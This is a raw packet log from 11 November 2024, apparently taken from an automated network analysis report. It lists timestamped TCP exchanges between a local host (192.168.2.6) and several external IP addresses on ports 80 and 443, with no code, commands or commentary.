Nov 11, 2024 18:13:45.465770960 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:45.465874910 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:45.860006094 CET	59138	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:45.860045910 CET	443	59138	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:45.860107899 CET	59138	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:45.860331059 CET	59138	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:45.860343933 CET	443	59138	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:45.868124962 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:45.868144989 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:45.868472099 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:45.868532896 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:45.870539904 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:45.911339998 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.072719097 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:46.073378086 CET	50518	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:46.074004889 CET	50517	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:46.074079037 CET	50517	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:46.075562954 CET	50520	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:46.078238010 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:46.078315020 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:46.078556061 CET	80	50518	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:46.081003904 CET	80	50520	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:46.089176893 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:46.089380980 CET	50515	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:46.094084978 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:46.094518900 CET	80	50515	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:46.114676952 CET	50521	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:46.114787102 CET	50521	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:46.127664089 CET	50525	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:46.129441977 CET	59140	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:46.132658958 CET	80	50525	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:46.134418011 CET	80	59140	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:46.134481907 CET	59140	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:46.136781931 CET	59140	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:46.141558886 CET	80	59140	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:46.150275946 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.150317907 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.150379896 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.150398970 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.150409937 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.150445938 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.150450945 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.150471926 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.150490999 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.150494099 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.150521040 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.150546074 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.232350111 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.232434988 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.232717037 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.232779026 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.234366894 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.234375000 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.234400988 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.234446049 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.234460115 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.234471083 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.234513998 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.235013962 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.235060930 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.295751095 CET	443	59138	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:46.295829058 CET	59138	443	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:46.320310116 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320353031 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320398092 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.320420980 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320437908 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.320576906 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.320729017 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320760012 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320779085 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.320782900 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320810080 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.320822001 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.320825100 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320839882 CET	443	59137	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:46.320879936 CET	59137	443	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:46.654476881 CET	80	59140	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:46.654537916 CET	59140	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:47.454432964 CET	80	63478	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:47.454493046 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:47.622538090 CET	59143	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:47.622946978 CET	59144	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:47.627450943 CET	80	59143	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:47.627515078 CET	59143	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:47.627698898 CET	80	59144	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:47.627760887 CET	59144	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:47.630422115 CET	59145	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:47.631726980 CET	59146	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:47.632065058 CET	59147	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:47.632685900 CET	59148	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:47.634289026 CET	59144	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:47.635447979 CET	80	59145	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:47.635814905 CET	59145	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:47.636560917 CET	80	59146	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:47.636625051 CET	59146	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:47.636934996 CET	80	59147	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:47.636989117 CET	59147	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:47.637501955 CET	80	59148	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:47.638308048 CET	59147	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:47.638314962 CET	59148	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:47.638638020 CET	59148	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:47.639293909 CET	80	59144	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:47.639712095 CET	59146	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:47.640121937 CET	59145	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:47.640886068 CET	59149	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:47.643351078 CET	80	59147	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:47.643907070 CET	80	59148	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:47.644845009 CET	80	59146	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:47.645276070 CET	80	59145	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:47.646076918 CET	80	59149	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:47.646668911 CET	59149	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:47.646869898 CET	59149	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:47.652728081 CET	80	59149	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:47.659254074 CET	59143	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:47.659404993 CET	59150	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:47.665047884 CET	80	59143	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:47.665349007 CET	80	59150	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:47.666686058 CET	59150	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:47.667139053 CET	59150	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:47.672833920 CET	80	59150	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:48.094137907 CET	80	59144	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:48.094166994 CET	80	59144	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:48.094253063 CET	59144	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:48.094588041 CET	80	59143	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:48.095720053 CET	80	59148	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:48.095789909 CET	59148	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:48.095866919 CET	59143	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:48.096736908 CET	80	59149	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:48.096801996 CET	59149	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:48.101782084 CET	80	59143	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:48.102817059 CET	80	59149	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:48.102885008 CET	59149	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:48.103019953 CET	80	59148	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:48.103066921 CET	59148	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:48.103336096 CET	59143	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:48.120119095 CET	80	59150	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:48.122313976 CET	80	59145	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:48.122374058 CET	80	59145	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:48.122409105 CET	59150	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:48.122414112 CET	59145	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:48.122467995 CET	59145	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:48.298973083 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.298988104 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299021006 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299047947 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.299072027 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299084902 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299091101 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.299119949 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.299128056 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.299135923 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299149036 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299175978 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.299190998 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.299194098 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299206018 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.299242973 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.300898075 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.300944090 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.304662943 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.304689884 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.304721117 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.304723978 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.304744959 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.304860115 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.353534937 CET	80	59146	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:48.356584072 CET	59146	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:48.380358934 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.380378008 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.380436897 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.380438089 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.380451918 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.380465984 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.380480051 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.380491972 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.380495071 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.380516052 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.380543947 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.381200075 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.381263971 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.381292105 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.381402016 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.381417036 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.381432056 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.381444931 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.381468058 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.381500959 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.381999016 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382026911 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382040024 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382074118 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.382085085 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382098913 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382105112 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.382132053 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.382143974 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.382934093 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382947922 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382958889 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382988930 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.382998943 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.383003950 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.383044958 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.385339975 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.388845921 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.428199053 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.428216934 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.428231955 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.428337097 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.428337097 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.461577892 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.461610079 CET	80	59139	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:48.461636066 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.461653948 CET	59139	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:48.550821066 CET	80	59147	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:48.550900936 CET	59147	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:49.816066980 CET	59153	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:49.817688942 CET	59154	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:49.817814112 CET	59155	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:49.821073055 CET	80	59153	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:49.821315050 CET	59153	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:49.821949005 CET	59156	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:49.822135925 CET	59153	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:49.822499990 CET	80	59154	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:49.822550058 CET	59154	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:49.822596073 CET	59154	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:49.822614908 CET	80	59155	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:49.822779894 CET	59155	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:49.822824955 CET	59155	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:49.826785088 CET	80	59156	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:49.826910019 CET	80	59153	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:49.826975107 CET	59156	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:49.827094078 CET	59156	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:49.827646971 CET	80	59154	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:49.827702045 CET	80	59155	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:49.832063913 CET	80	59156	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:49.834146023 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:49.839118004 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:49.839238882 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:49.839425087 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:49.844233990 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:49.981236935 CET	59158	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:49.981527090 CET	59159	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:49.981817961 CET	59160	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:49.981965065 CET	59161	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:49.986155033 CET	80	59158	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:49.986223936 CET	59158	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:49.986304045 CET	80	59159	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:49.986351013 CET	59159	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:49.986660004 CET	59159	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:49.986871004 CET	80	59160	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:49.987008095 CET	59160	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:49.988763094 CET	80	59161	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:49.988827944 CET	59161	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:49.991729021 CET	80	59159	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:49.992758989 CET	59161	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:49.998791933 CET	80	59161	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:50.232692003 CET	80	59153	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:50.233855009 CET	59153	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:50.251158953 CET	80	59155	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:50.251180887 CET	80	59155	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:50.251240015 CET	59155	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:50.256191015 CET	80	59156	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:50.256494045 CET	59156	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:50.263922930 CET	80	59156	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:50.263988972 CET	59156	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:50.267966986 CET	59156	80	192.168.2.6	75.2.71.199
Nov 11, 2024 18:13:50.273396015 CET	80	59156	75.2.71.199	192.168.2.6
Nov 11, 2024 18:13:50.417131901 CET	80	59159	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:50.418085098 CET	80	59161	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:50.418150902 CET	59159	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:50.418617010 CET	59161	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:50.424524069 CET	80	59159	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:50.424596071 CET	59159	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:50.425657034 CET	80	59161	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:50.425760031 CET	59161	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:50.502840042 CET	80	59154	188.114.97.3	192.168.2.6
Nov 11, 2024 18:13:50.502916098 CET	59154	80	192.168.2.6	188.114.97.3
Nov 11, 2024 18:13:51.286067963 CET	80	63518	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:51.286161900 CET	63518	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:51.433240891 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433345079 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433346987 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.433357954 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433372021 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433383942 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433398962 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433403969 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.433410883 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433423996 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433434963 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433446884 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.433474064 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.433492899 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.441363096 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.441435099 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.514450073 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514477968 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514492989 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514517069 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.514550924 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514550924 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.514564037 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514604092 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.514877081 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514889002 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514900923 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514928102 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.514945030 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.514952898 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.514991999 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.515130997 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.515167952 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.515733004 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.515748024 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.515760899 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.515774965 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.515798092 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.515887976 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.515899897 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.515927076 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.515953064 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.516551018 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.516592979 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.516597033 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.516613007 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.516643047 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.516668081 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.516679049 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.516746998 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.516746998 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.517461061 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.517505884 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.517522097 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.519458055 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.519515991 CET	59157	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:51.519622087 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.519634962 CET	80	59157	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:51.519670963 CET	59157	80	192.168.2.6	199.191.50.83
